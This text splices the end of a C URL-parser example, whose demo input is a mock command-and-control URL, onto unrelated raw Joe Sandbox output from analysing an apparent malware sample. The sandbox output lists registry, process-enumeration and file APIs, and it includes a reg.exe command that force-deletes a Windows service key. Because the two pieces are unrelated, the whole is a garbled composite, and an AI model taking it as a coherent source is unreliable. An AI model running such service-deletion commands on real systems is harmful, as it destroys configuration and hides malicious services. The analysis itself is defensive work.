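    char hostport[HOST_BUF + 8];     /* host + ":65535" + NUL */
    char rest[PATH_BUF];
    char extra[8];
    int  n;

    memset(out, 0, sizeof *out);
    if (strncmp(url, prefix, sizeof prefix - 1) != 0)
        return 0;
    url += sizeof prefix - 1;

    /* Stage 1, "%[^/]%s": host[:port] up to the first '/', then the rest. */
    rest[0] = '\0';
    n = sscanf(url, "%71[^/]%255s", hostport, rest);
    if (n < 1)
        return 0;
    /* If the width cut the host part short, %s picks up a non-'/' byte. */
    if (rest[0] != '\0' && rest[0] != '/')
        return 0;
    /* A remainder that fills the buffer was probably truncated; refuse it. */
    if (strlen(rest) >= PATH_BUF - 1)
        return 0;

    /* Stage 2, "%[^:]:%d%s": split host from port; trailing %s catches junk. */
    extra[0] = '\0';
    out->port = 80;                  /* default when no ":port" is present */
    n = sscanf(hostport, "%63[^:]:%d%7s", out->host, &out->port, extra);
    if (n < 1 || extra[0] != '\0')
        goto reject;
    /* No port parsed: the whole host part must have fit, or it was cut. */
    if (n == 1 && strcmp(out->host, hostport) != 0)
        goto reject;
    if (out->port < 1 || out->port > 65535)
        goto reject;

    strcpy(out->path, rest[0] ? rest : "/");
    return 1;

reject:
    memset(out, 0, sizeof *out);
    return 0;
}

int main(void)
{
    /* Constructed demo input, not a URL taken from the sample. */
    const char *demo = "http://c2.example.test:8080/gate.php";
    struct url_parts p;

    if (parse_http_url(demo, &p))
        printf("host=%s port=%d path=%s\n", p.host, p.port, p.path);
    else
        printf("rejected: %s\n", demo);
    return 0;
}
```

The two extra checks after each `sscanf` matter more than the widths themselves: a width stops the overflow, but `sscanf` then silently continues with the next conversion, so an over-long host shows up as a remainder that does not begin with `/`, and an over-long host part without a port shows up as a host that no longer equals the input. Without those checks a truncated host would be accepted as valid.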
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB60E4: GetObjectA.GDI32(?,00000004), ref: 0BEB60FB
                                                                                    • Part of subcall function 0BEB60E4: GetPaletteEntries.GDI32(?,00000000,?), ref: 0BEB611E
                                                                                  • GetDC.USER32(00000000), ref: 0BEB72D2
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0BEB72DE
                                                                                  • SelectObject.GDI32(?), ref: 0BEB72EB
                                                                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0BEB7343,?,?,?,?,00000000), ref: 0BEB730F
                                                                                  • SelectObject.GDI32(?,?), ref: 0BEB7329
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB7332
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0BEB733D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                  • String ID:
                                                                                  • API String ID: 4046155103-0
                                                                                  • Opcode ID: 95736c6e41b07f0b96711fef0a0910f575c84bb553cbb0118bdb3119dc364a78
                                                                                  • Instruction ID: ffdb1362f8575bbc0944bda61f8874dd77875fa04fefdc4eaf0191e686274f0c
                                                                                  • Opcode Fuzzy Hash: 95736c6e41b07f0b96711fef0a0910f575c84bb553cbb0118bdb3119dc364a78
                                                                                  • Instruction Fuzzy Hash: 02115172E14219AFDF10EBE8D851EAFB3BCEB48300F4054A5E914D7650E7749E4487A0
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6A6F4E95
                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6A6F4EB8
                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6A6F4ED4
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6F4EE4
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 6A6F4EEE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreate$Open
                                                                                  • String ID: software
                                                                                  • API String ID: 1740278721-2010147023
                                                                                  • Opcode ID: 005f434ff837a1dc2e703e5ae5f6145b2ce0e7bc5d0e75ba75f0725d063eeaf3
                                                                                  • Instruction ID: b07ffac5647438392b9292fe8759ec503479f882ae5eb752481033c305cbd564
                                                                                  • Opcode Fuzzy Hash: 005f434ff837a1dc2e703e5ae5f6145b2ce0e7bc5d0e75ba75f0725d063eeaf3
                                                                                  • Instruction Fuzzy Hash: FD11E376D00219FB8B21DADACD88CDFBFBEEBCA750B1140AAA504A2111D6719E01DB64
                                                                                  APIs
                                                                                    • Part of subcall function 0BE9EAB4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0BE9EAD0
                                                                                    • Part of subcall function 0BE9EAB4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0BE9EAF4
                                                                                    • Part of subcall function 0BE9EAB4: GetModuleFileNameA.KERNEL32(500BEFB6), ref: 0BE9EB0F
                                                                                    • Part of subcall function 0BE9EAB4: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0BE9EBB3
                                                                                  • CharToOemA.USER32(?,?), ref: 0BE9EC83
                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0BE9ECA0
                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0BE9ECA6
                                                                                  • GetStdHandle.KERNEL32(000000F4,0BE9ED10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0BE9ECBB
                                                                                  • WriteFile.KERNEL32(00000000,000000F4,0BE9ED10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0BE9ECC1
                                                                                  • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0BE9ECE3
                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0BE9ECF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 185507032-0
                                                                                  • Opcode ID: 45406ac20ac22bc172c244ac08195ca488fa875f63a8078e1b7fff86f3b38718
                                                                                  • Instruction ID: 2a140a60f8ff9468d996f55eda9b728aa4f71b68664234eac02c5e30a066c2cd
                                                                                  • Opcode Fuzzy Hash: 45406ac20ac22bc172c244ac08195ca488fa875f63a8078e1b7fff86f3b38718
                                                                                  • Instruction Fuzzy Hash: 82115AB2154305BEDB00E7A4EC42F9B77ECAB84610F402A26B758D60E1DB74E94C8766
                                                                                  APIs
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6A6F3E22
                                                                                  • __CxxThrowException@8.LIBCMT ref: 6A6F3E2C
                                                                                    • Part of subcall function 6A7013A2: RaiseException.KERNEL32(?,?,00000000,?), ref: 6A7013E4
                                                                                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3E43
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3E50
                                                                                    • Part of subcall function 6A6EE1FA: __CxxThrowException@8.LIBCMT ref: 6A6EE210
                                                                                  • _memset.LIBCMT ref: 6A6F3E6F
                                                                                  • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,?,?,00000001), ref: 6A6F3E80
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3EA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                  • String ID:
                                                                                  • API String ID: 356813703-0
                                                                                  • Opcode ID: 3e033a48a5abb8fc1fe89177cd8e5bfad9edbd34823a322e29bbfb3a410df61f
                                                                                  • Instruction ID: 1af4b4908c141ad5c17ca32badbfc11e6a42a0b45d1d1a843a5ed0ba8dc0c060
                                                                                  • Opcode Fuzzy Hash: 3e033a48a5abb8fc1fe89177cd8e5bfad9edbd34823a322e29bbfb3a410df61f
                                                                                  • Instruction Fuzzy Hash: 79113C70500606AFDB20AF64C88DC6BBBF6FF41318711C929F95696555CF34AC15CFA4
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\pl.txt
                                                                                  • API String ID: 3727115324-85274317
                                                                                  • Opcode ID: 6fb3710159b9eaf6ba8099d8dd8301df0857547208a248e28ee66f6ad5efb83e
                                                                                  • Instruction ID: 1d6304dac848d52b37556bfc950336f208629421f10a47390e89277d468f5485
                                                                                  • Opcode Fuzzy Hash: 6fb3710159b9eaf6ba8099d8dd8301df0857547208a248e28ee66f6ad5efb83e
                                                                                  • Instruction Fuzzy Hash: FD012BB1D0422167E30096A89D58FAB3BE95F822C0F1A8511F94897222EE60E90DC3E5
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: DebugOutputString$__wfopen_s_memset_strncpy
• String ID: C:\pl.txt
• API String ID: 3727115324-85274317
• Opcode ID: 51125939bb5a43f679e928450e508b071cd2e41894781f2657591012dd31054f
• Instruction ID: b16cb5c3122eef44a79e44959416db4290028571b26a9fe54412158c17b4d875
• Opcode Fuzzy Hash: 51125939bb5a43f679e928450e508b071cd2e41894781f2657591012dd31054f
• Instruction Fuzzy Hash: 25014E7190812567D30097A89D48F9B3BF98FC1284F1A4510FA54E7212DF64E90DC3E5
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: DebugOutputString$__wfopen_s_memset_strncpy
• String ID: C:\pl.txt
• API String ID: 3727115324-85274317
• Opcode ID: 90a169d44067d8161744e75840ccdc84d934a1268c3e5fb2854693f69785bce9
• Instruction ID: 3cceb579ae20f343646a091740c09fc86ad99a65e26eac10be325f0ad3335aca
• Opcode Fuzzy Hash: 90a169d44067d8161744e75840ccdc84d934a1268c3e5fb2854693f69785bce9
• Instruction Fuzzy Hash: FF01FC7290421567E600EA649D5CF973BF58F85348F0A4914F54097252DFB4E90DC7E5
APIs
• _memset.LIBCMT ref: 6A6DFEB8
  • Part of subcall function 6A6E05A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,?), ref: 6A6E05C3
  • Part of subcall function 6A6E05A0: _memset.LIBCMT ref: 6A6E05DA
  • Part of subcall function 6A6E05A0: Process32First.KERNEL32 ref: 6A6E05F0
  • Part of subcall function 6A6E05A0: CloseHandle.KERNEL32(00000000), ref: 6A6E05FA
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memset$CloseCreateFirstHandleProcess32SnapshotToolhelp32
• String ID: .$d$m$w$x
• API String ID: 113637525-2193154829
• Opcode ID: 3312bf2ab79443254e0d5aec8ea6410b283a42c37909150b9eeee4e5a14e38e6
• Instruction ID: 19e6cfcc88e4a6d06cca9f2b92cc2baa8d9015d801f41ba81578deaaf2c991ab
• Opcode Fuzzy Hash: 3312bf2ab79443254e0d5aec8ea6410b283a42c37909150b9eeee4e5a14e38e6
• Instruction Fuzzy Hash: 99018B7150C3818EE311DB28D849BDBBFE55B92248F44482DE4D886242EB75A60CC7F3
APIs
• _memset.LIBCMT ref: 6A6E1975
• _sprintf.LIBCMT ref: 6A6E199A
• ShellExecuteA.SHELL32(00000000,open,reg.exe,00000000,00000000,00000000), ref: 6A6E19B7
Strings
• reg.exe, xrefs: 6A6E19AB
• delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f, xrefs: 6A6E1994
• open, xrefs: 6A6E19B0
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: ExecuteShell_memset_sprintf
• String ID: delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f$open$reg.exe
• API String ID: 4205763113-3721450906
• Opcode ID: 3dd8d9d376c3801852fe61c935c3da8da9d8311debf6a72d2353e115c4dbaffc
• Instruction ID: 157b2cf3b9dcab0b7c65fe0ebc2a6bfae032df9cb621b7f836956f77ca8ff24e
• Opcode Fuzzy Hash: 3dd8d9d376c3801852fe61c935c3da8da9d8311debf6a72d2353e115c4dbaffc
• Instruction Fuzzy Hash: F9F0E9B0549300BBE210D720DD4AFDA77F49BA5708F414828F6CC991C5EEB45708C793
APIs
• GetSysColor.USER32(0000000F), ref: 6A6FAB07
• GetSysColor.USER32(00000010), ref: 6A6FAB0E
• GetSysColor.USER32(00000014), ref: 6A6FAB15
• GetSysColor.USER32(00000012), ref: 6A6FAB1C
• GetSysColor.USER32(00000006), ref: 6A6FAB23
• GetSysColorBrush.USER32(0000000F), ref: 6A6FAB30
• GetSysColorBrush.USER32(00000006), ref: 6A6FAB37
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Color$Brush
• String ID:
• API String ID: 2798902688-0
• Opcode ID: c8c483714c4d11538339f82caf6cb9532513dae66ef37a70a36ad3bc0d7d6a44
• Instruction ID: 5137b3cb75ef9bb02181b2d8134a18fb405c7372dab9976abc4bed27684ab229
• Opcode Fuzzy Hash: c8c483714c4d11538339f82caf6cb9532513dae66ef37a70a36ad3bc0d7d6a44
• Instruction Fuzzy Hash: 77F0FE719407445BD730BB738909B47BED1FFC4710F06092ED2458B990E6B5E441DF40
APIs
